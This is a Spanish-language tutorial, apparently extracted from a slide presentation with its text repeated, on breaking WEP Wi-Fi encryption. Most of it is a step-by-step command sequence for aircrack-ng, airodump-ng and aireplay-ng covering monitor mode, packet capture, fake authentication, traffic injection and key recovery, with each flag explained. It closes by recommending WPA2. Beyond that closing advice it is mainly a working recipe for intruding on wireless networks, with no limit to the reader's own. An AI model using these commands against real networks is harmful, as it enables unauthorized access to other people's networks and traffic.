QuéesWEP
Según la wikipedia: WEP, acrónimo de Wired Equivalent
Privacy o "Privacidad Equivalente a Cableado", es el sistema
de cifrado incluido en el estándar IEEE 802.11 como protocolo
para redes Wireless que permite cifrar la información que se
transmite. Los mensajes de difusión de las redes inalámbricas
se transmiten por ondas de radio, lo que los hace más
susceptibles, frente a las redes cableadas, de ser captados con
relativa facilidad.
Básicamente es un sistema de encriptación para redes
inalámbricas ya sea con autenticación abierta o con clave
compartida.
¿Comosepodría pasarlaseguridadWEP?
Para poder atravesar esta seguridad se utilizan programas
llamados Packet Sniffers y uncrackeador WEP. Se captura
una cantidad determinada de paquetes y luego mediante el
crackeador se rompe el cifrado de la red. Un key cracker es un
programa basado generalmente en matemáticas estadísticas
que procesa los paquetes capturas para descifrar la clave WEP.
Es bastante simple y se los muestro a continuación, cualquier
persona con una tarjeta inalámbrica y un sistema de comandos
lo puedes hacer.
CrackeodeWEP con Aircrack-ng
Para poder realizar lo anterior tenemos disponibles una serie de
herramientas bastantes útiles, en esta situación utilizaremos
una suite de herramientas que reúne todos los elementos
necesarios para desencriptar el sistema WEP: aircrack-ng. Lo
haremos en Linux, pero funciona en Windows también.
En este caso utilizaremos un sistema operativo basado en
Debian: Ubuntu. Para instalar la suite aircrack-ng basta con
ejecutar en linea de comandos:
Código :
sudo apt-get install aircrack-ng
El siguiente paso es poner nuestra tarjeta de red en modo
monitor.. ¿Pero que es eso?
Wikipedia :
Modo Monitor, también llamado de Modo de Monitoramento o modo RFMON, permite que
un ordenador con una placa con interfaz de red wireless (WNIC) realice monitoramento de
todo el tráfico recibido de la red wireless.
Activamos:
Código :
airmon-ng start wlan0
Se activa en mon0, esto ya depende de tu tarjeta de red, para
más información (por que este no es el tema) consulta
SanGoogle.
Y monitoreamos:
Código :
airodump-ng mon0
Al insertar el ultimo comando nuestra tarjeta de red está
captando y monitoreando todas las redes disponibles a nuestro
alrededor. Saldrán varios elementos, información sobre las
redes. Nos enfocaremos principalmente en BSSID (una clave
estilo MAC), CH (el canal donde se encuentra la red), ENC (la
encriptación debe de ser WEP por obvias razones) y
el ESSID(básicamente el nombre de la red).
Para obtener esos datos, corremos:
Código :
airodump-ng -c [# canal] -w [ESSID] --bssid [BSSID]
mon0
En la primera parte estamos utilizando la suite aircrack-ng.
-c Especificamos el canal.
-w Especificamos ESSID.
--bssid Habla por si solo.
mon0 De donde estamos monitoreando.
Inyeccióndetráficoaredeswifi WEP conaireplay
Así es. Y basta con la herramienta aireplay (el cual inyecta
tráfico para elevar la captura de vectores de inicio) para hacerlo.
Código :
aireplay-ng -1 6000 -a [BSSID] -h [tu MAC] mon0
Donde:
-1 6000 Es un tipo de ataque que genera una autenticación
falsa con retraso.
-a Es el punto de acceso, enseguida ponemos el BSSID.
-h Es el source, aquí ponemos nuestra MAC address.
mon0 La interfaz que utilizamos.
Para ver lo que inyectamos:
Código :
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b
[BSSID] -h [tu MAC] mon0
-2 El tipo de ataque interactivo con los paquetes.
-p Aplica control en palabras.
-c Una MAC destino.
-b BSSID.
-h Es el source, aquí ponemos nuestra MAC address.
mon0 La interfaz que utilizamos.
Crackear laclave WEP delaredwifi elegida
Lo haremos con un key cracker, la suite aircrack-ng lo tiene, así
que lo activamos con el siguiente y simple comando.
Código :
aircrack-ng -z [BSSID]*.cap
Bastará que hayamos capturado suficientes paquetes para que
el key cracker sea capaz de desencriptar la red WEP. En unos
segundos o minutos (según sea el caso) aparecerá un mensaje
como el siguiente:
Código :
KEY FOUND! [ 1234567890 ]
Espero que con este pequeño tip haya quedado claro que la
encriptación WEP en las redes inalámbricas no es segura.
Siempre hay métodos para desencriptar cualquier tipo de
sistema pero la dificultad aumenta conforme a las tecnologías
avanzan.
¿Qué recomiendo? Usa WPA-2.
aircrack-ng -z [BSSID]*.cap
Bastará que hayamos capturado suficientes paquetes para que
el key cracker sea capaz de desencriptar la red WEP. En unos
segundos o minutos (según sea el caso) aparecerá un mensaje
como el siguiente:
Código :
KEY FOUND! [ 1234567890 ]
Espero que con este pequeño tip haya quedado claro que la
encriptación WEP en las redes inalámbricas no es segura.
Siempre hay métodos para desencriptar cualquier tipo de
sistema pero la dificultad aumenta conforme a las tecnologías
avanzan.
¿Qué recomiendo? Usa WPA-2.

Qué es wep

  • 1.
    QuéesWEP Según la wikipedia:WEP, acrónimo de Wired Equivalent Privacy o "Privacidad Equivalente a Cableado", es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad. Básicamente es un sistema de encriptación para redes inalámbricas ya sea con autenticación abierta o con clave compartida. ¿Comosepodría pasarlaseguridadWEP? Para poder atravesar esta seguridad se utilizan programas llamados Packet Sniffers y uncrackeador WEP. Se captura una cantidad determinada de paquetes y luego mediante el crackeador se rompe el cifrado de la red. Un key cracker es un programa basado generalmente en matemáticas estadísticas que procesa los paquetes capturas para descifrar la clave WEP. Es bastante simple y se los muestro a continuación, cualquier persona con una tarjeta inalámbrica y un sistema de comandos lo puedes hacer. CrackeodeWEP con Aircrack-ng Para poder realizar lo anterior tenemos disponibles una serie de herramientas bastantes útiles, en esta situación utilizaremos una suite de herramientas que reúne todos los elementos necesarios para desencriptar el sistema WEP: aircrack-ng. Lo
  • 2.
    haremos en Linux,pero funciona en Windows también. En este caso utilizaremos un sistema operativo basado en Debian: Ubuntu. Para instalar la suite aircrack-ng basta con ejecutar en linea de comandos: Código : sudo apt-get install aircrack-ng El siguiente paso es poner nuestra tarjeta de red en modo monitor.. ¿Pero que es eso? Wikipedia : Modo Monitor, también llamado de Modo de Monitoramento o modo RFMON, permite que un ordenador con una placa con interfaz de red wireless (WNIC) realice monitoramento de todo el tráfico recibido de la red wireless. Activamos: Código : airmon-ng start wlan0 Se activa en mon0, esto ya depende de tu tarjeta de red, para más información (por que este no es el tema) consulta SanGoogle. Y monitoreamos:
  • 3.
    Código : airodump-ng mon0 Alinsertar el ultimo comando nuestra tarjeta de red está captando y monitoreando todas las redes disponibles a nuestro alrededor. Saldrán varios elementos, información sobre las redes. Nos enfocaremos principalmente en BSSID (una clave estilo MAC), CH (el canal donde se encuentra la red), ENC (la encriptación debe de ser WEP por obvias razones) y el ESSID(básicamente el nombre de la red). Para obtener esos datos, corremos: Código : airodump-ng -c [# canal] -w [ESSID] --bssid [BSSID] mon0 En la primera parte estamos utilizando la suite aircrack-ng. -c Especificamos el canal. -w Especificamos ESSID. --bssid Habla por si solo. mon0 De donde estamos monitoreando. Inyeccióndetráficoaredeswifi WEP conaireplay Así es. Y basta con la herramienta aireplay (el cual inyecta tráfico para elevar la captura de vectores de inicio) para hacerlo. Código :
  • 4.
    aireplay-ng -1 6000-a [BSSID] -h [tu MAC] mon0 Donde: -1 6000 Es un tipo de ataque que genera una autenticación falsa con retraso. -a Es el punto de acceso, enseguida ponemos el BSSID. -h Es el source, aquí ponemos nuestra MAC address. mon0 La interfaz que utilizamos. Para ver lo que inyectamos: Código : aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h [tu MAC] mon0 -2 El tipo de ataque interactivo con los paquetes. -p Aplica control en palabras. -c Una MAC destino. -b BSSID. -h Es el source, aquí ponemos nuestra MAC address. mon0 La interfaz que utilizamos. Crackear laclave WEP delaredwifi elegida Lo haremos con un key cracker, la suite aircrack-ng lo tiene, así que lo activamos con el siguiente y simple comando. Código :
  • 5.
    aircrack-ng -z [BSSID]*.cap Bastaráque hayamos capturado suficientes paquetes para que el key cracker sea capaz de desencriptar la red WEP. En unos segundos o minutos (según sea el caso) aparecerá un mensaje como el siguiente: Código : KEY FOUND! [ 1234567890 ] Espero que con este pequeño tip haya quedado claro que la encriptación WEP en las redes inalámbricas no es segura. Siempre hay métodos para desencriptar cualquier tipo de sistema pero la dificultad aumenta conforme a las tecnologías avanzan. ¿Qué recomiendo? Usa WPA-2.
  • 6.
    aircrack-ng -z [BSSID]*.cap Bastaráque hayamos capturado suficientes paquetes para que el key cracker sea capaz de desencriptar la red WEP. En unos segundos o minutos (según sea el caso) aparecerá un mensaje como el siguiente: Código : KEY FOUND! [ 1234567890 ] Espero que con este pequeño tip haya quedado claro que la encriptación WEP en las redes inalámbricas no es segura. Siempre hay métodos para desencriptar cualquier tipo de sistema pero la dificultad aumenta conforme a las tecnologías avanzan. ¿Qué recomiendo? Usa WPA-2.